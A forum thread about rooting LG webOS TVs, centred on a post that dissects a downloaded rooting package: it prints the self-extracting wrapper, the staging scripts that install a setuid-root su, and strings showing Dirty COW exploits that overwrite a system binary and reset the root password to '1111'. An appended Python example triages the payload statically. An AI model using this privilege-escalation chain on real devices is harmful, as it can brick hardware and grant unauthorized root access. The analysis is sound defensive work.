  1.    #1  
    A source informs us that instructions have been published on gaining root access to a webOS TV. This is much harder than on the old phones and tablets. When this was done on legacy webOS, there was a wave of enhancements and tweaks made available to phone users from webOS Internals and other developers.

    NOTE: As stated in the article and original thread, this has the potential to brick your TV and void your warranty, which given the prices of the higher end TVs, could prove extremely expensive. Do not try this unless you are very sure of what you are doing and at your own risk.
  2. #2  
    I've done an analysis of the root access method described at http://webos-forums.ru/topic4650.html ...

    Disclaimer: I do not have a webOS TV and have not attempted or verified these steps.

    There are 12 steps to the procedure:

    Steps 1, 2 and 3 are all about setting up a developer account, installing a Developer Mode application on your device, enabling Dev Mode Status and Key Server switches, and gaining SSH developer access to your device.

    Step 4 involves downloading a file from http://zalil.su/6937580 - you should be wary of downloading executables from random sites and executing them on your device.

    Steps 5 through 7 detail how to get this file onto your device.

    Steps 8 through 12 are running the script and getting the root shell.

    So, let's look at things in more detail ...

    The downloaded file is a shell script containing an embedded binary archive:
    Code:
    #!/bin/bash
    uuencode=0
    binary=1
    match=$(grep -n '^PAYLOAD:$' $0 | cut -d ':' -f 1)
    payload_start=$((match + 1))
    if [[ $binary -ne 0 ]]; then
            tail -n +$payload_start $0 | tar -xzvf - > /dev/null
    fi
    chmod +x *
    ./rt.sh
    rm firstg
    rm secstg
    rm rt.sh
    rm su
    rm rep
    exit 0
    PAYLOAD:
    <... lots of binary encoded data ...>

    The way to extract the archive is to cut all of the data after the PAYLOAD: line, and insert it into a file with a .tar.gz extension.

    Here are the contents of the archive:
    Code:
    $ tar ztvf ~/Downloads/6937580_root.tar.gz 
    drwxrwxrwx  0 root   root        0 Jul 28 16:21 ./
    -rwxrwxrwx  0 5482   5000      168 Jul 28 15:20 ./rep
    -rwxrwxrwx  0 5482   5000      416 Jul 28 15:35 ./rt.sh
    -rwxrwxrwx  0 5482   5000    39987 Jul 28 15:19 ./secstg
    -rwxrwxrwx  0 5482   5000    11052 Jul 28 15:24 ./su
    -rwxrwxrwx  0 5482   5000    16236 Jul 28 15:19 ./firstg

    Let's look at each file individually:
    • rt.sh - a shell script which sequences the rooting procedure
    • firstg - a binary executable
    • rep - a shell script which copies the su executable from /var/palm/jail/com.palm.devmode.openssh/media/developer/su to /dev/shm/test/su and changes ownership of the su executable to root
    • secstg - a binary executable
    • su - looks like the standard su program from busybox


    Let's take a deeper look at rt.sh:
    Code:
    #!/bin/sh
    echo "first stage"
    ./firstg /usr/bin/ApplicationInstallerUtility rep > /dev/null 2>&1
    sleep 2
    echo "second stage"
    ./secstg > /dev/null 2>&1
    sleep 2
    echo "third stage - "
    echo "try install any app from market"
    echo "wait..."
    while [ ! -f /dev/shm/test/su ]
    do
      sleep 2
      echo "try install any app from market"
    done
    sleep 1
    echo "third stage ok"
    echo "try get root - input password 1111"
    /dev/shm/test/su

    The firstg binary contains the following interesting strings:
    Code:
    usage: dirtyc0w target_file new_content
    GCC: (crosstool-NG linaro-1.13.1+bzr2709 - Linaro GCC 2014.11) 4.9.3 20141031 (prerelease)
    GNU C 4.9.3 20141031 (prerelease) -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16 -mlittle-endian -mtune=cortex-a9 -mthumb -mtls-dialect=gnu -g -O2 -std=gnu99 -fgnu89-inline -fmerge-all-constants -frounding-math
    /home/christopher/Development/linaro/.build/src/eglibc-linaro-2.19-2014.08/...
    /home/christopher/Development/linaro/.build/src/gcc-linaro-4.9-2014.11/...
    /home/evgen/dev/arm-linux-gnueabi-linaro_4.9.3-2014.11/...
    crtstuff.c
    dirtycow.c
    elf-init.c
    fstat.c

    The dirtyc0w program name referenced in the usage string indicates that this is Dirty COW (CVE-2016-5195), a privilege escalation vulnerability in the Linux Kernel. See https://dirtycow.ninja/ for more details on Dirty Cow.

    So firstg seems to be the canned exploit found at https://github.com/dirtycow/dirtycow...ter/dirtyc0w.c and the intent of the firstg call is to insert the contents of the rep script into the /usr/bin/ApplicationInstallerUtility binary.

    So let's look at the rep script:
    Code:
    #!/bin/sh
    mkdir /dev/shm/test
    cp /var/palm/jail/com.palm.devmode.openssh/media/developer/su /dev/shm/test/
    chown root:root /dev/shm/test/su
    chmod u+s /dev/shm/test/su

    This takes the su binary which was unpacked in the openssh jail /media/developer directory, and places it in /dev/shm/test/ with root privileges.

    The secstg binary contains the following interesting strings:
    Code:
    $ strings secstg 
    /tmp/.ssh_bak
    ./.ssh_bak
    root:
    WejG7Q39pocco
    sshd:
    /etc/passwd
     [-s] [-n] | [-h]
     -s  open directly a shell, if the exploit is successful;
     -n  combined with -s, doesn't restore the passwd file.
     -h  print this synopsis;
     If no param is specified, the program modifies the passwd file and exits.
     A copy of the passwd file will be create in the current directory as .ssh_bak
     (unprivileged user), if no parameter or -n is specified.
    Password overridden to: 
    1111
    Root password is:   
    Enjoy! :-)
    /home/tcwg-buildslave/workspace/tcwg-make-release/label/tcwg-x86_64-ex40/...
    GNU C 4.9.4 20151028 (prerelease) -march=armv7-a -mtune=cortex-a9 -mfloat-abi=softfp -mfpu=vfpv3-d16 -mthumb -mtls-dialect=gnu -g -O2 -std=gnu99 -fgnu89-inline -fmerge-all-constants -frounding-math
    /home/evgen/dev/toolchains/gcc-linaro-4.9-2016.02-x86_64_arm-linux-gnueabi/...

    So secstg seems to be the canned exploit found at https://github.com/gbonacini/CVE-201...aster/dcow.cpp and the intent of the secstg call is to change the root password to "1111".

    The rest of the rt.sh script then asks the user to install any application (which then causes the modified /usr/bin/ApplicationInstallerUtility binary to be called, which copies the su binary to a shared location accessible by the script and gives it root privileges) and then executes it. The user then provides the new root password and is presented with a root shell.

    -- Rod
    WebOS Internals and Preware Founder and Developer
    You may wish to donate by Paypal to donations @ webos-internals.org if you find our work useful.
    All donations go back into development.
    www.webos-internals.org twitter.com/webosinternals facebook.com/webosinternals
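
The kind of static review described in post #2 (cut the data after the PAYLOAD: line, list the archive, read the strings) can be done entirely in memory, so the downloaded file is never run or unpacked to disk. This is an added example, not part of the original thread; the function names, the indicator list and the constructed sample file are assumptions.

```python
import io
import re
import tarfile

MARKER = b"PAYLOAD:"  # marker line used by the stub shown in post #2

def split_payload(script: bytes) -> bytes:
    """Return everything after the first line that is exactly the marker."""
    m = re.search(rb"^" + MARKER + rb"\r?\n", script, re.MULTILINE)
    if m is None:
        raise ValueError("no PAYLOAD: marker line found")
    return script[m.end():]

def strings(data: bytes, min_len: int = 6):
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def triage(script: bytes, indicators):
    """Inspect the embedded archive in memory; nothing is written or executed."""
    report = []
    with tarfile.open(fileobj=io.BytesIO(split_payload(script)), mode="r:gz") as tar:
        for member in tar:
            if not member.isfile():
                continue
            data = tar.extractfile(member).read()
            kind = "script" if data.startswith(b"#!") else "binary"
            found = strings(data)
            hits = sorted(i for i in indicators if any(i in s for s in found))
            report.append((member.name, oct(member.mode), kind, hits))
    return report

def build_sample() -> bytes:
    """Constructed stand-in for the download: shell stub plus gzip'd tar."""
    members = {
        "rep": b"#!/bin/sh\necho constructed sample\n",
        "firstg": b"\x7fELF\x01\x01\x00usage: dirtyc0w target_file new_content\x00",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(data), 0o777
            tar.addfile(info, io.BytesIO(data))
    stub = b"#!/bin/bash\nmatch=$(grep -n '^PAYLOAD:$' $0 | cut -d ':' -f 1)\nexit 0\n"
    return stub + MARKER + b"\n" + buf.getvalue()

if __name__ == "__main__":
    for row in triage(build_sample(), ["dirtyc0w", "/etc/passwd"]):
        print(row)
```

The stub's own grep line mentions the marker but is not a line consisting only of `PAYLOAD:`, so the split lands on the real boundary, as it does for the original script.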
  3. #3  
    Hello!
    I'm from webos-forums.ru. I've had root on my TV for a while and can help you with translation or testing on LG webOS 1.4.
  4. #4  
    Quite interesting! Thanks for the analysis, Rod! (Also, nice to still see you around. )
    Did you know:

    webOS ran on a Treo 800 during initial development.
  5. #5  
    Nice, I just ordered a 49" LG with WebOS. I don't know what I'll be able to tweak if anything, but rooting it sounds fun.
  6. #6  

    I want to install applications from outside the LG store.
